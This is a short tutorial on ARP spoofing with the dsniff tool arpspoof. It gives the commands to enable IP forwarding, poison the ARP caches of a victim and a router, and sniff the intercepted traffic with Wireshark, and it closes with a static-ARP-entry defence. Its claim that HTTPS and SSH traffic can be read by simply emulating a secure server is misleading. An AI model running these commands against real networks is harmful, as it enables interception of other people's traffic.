arpspoof

Suposing we've installed a linux with dsniff tool, we have to enable routing in system's kernel:

sysctl  -w net.ipv4.ip_forward= 1

We have to create two different process for establishing a connection between the two machines (router and victim) and us:

arpspoof  -i eth0 ROUTER_IP_ADDRESS  -t VICTIM_IP_ADDRESS

arpspoof  -i eth0 VICTIM_IP_ADDRESS  -t ROUTER_IP_ADDRESS

Now we can execute  Wireshark  (Packet analyzer) and view what is the information encapsulated in the IP packets sended between router and victim.
As this tecnique is like a " man in the middle " (We are between victim and router), we also can know SSL encrypted information like HTTPS or SSH protocols can offer, we only have to emulate a secure server.

How to prevent it

First we have to know the router hardware address (MAC), for it we can search in our ARP table an address like router with:

arp

Once we know the MAC, we have to add manually a permanent ARP entry with the next command:

arp  -s ROUTER_IP_ADDRESS ROUTER_HW_ADDRESS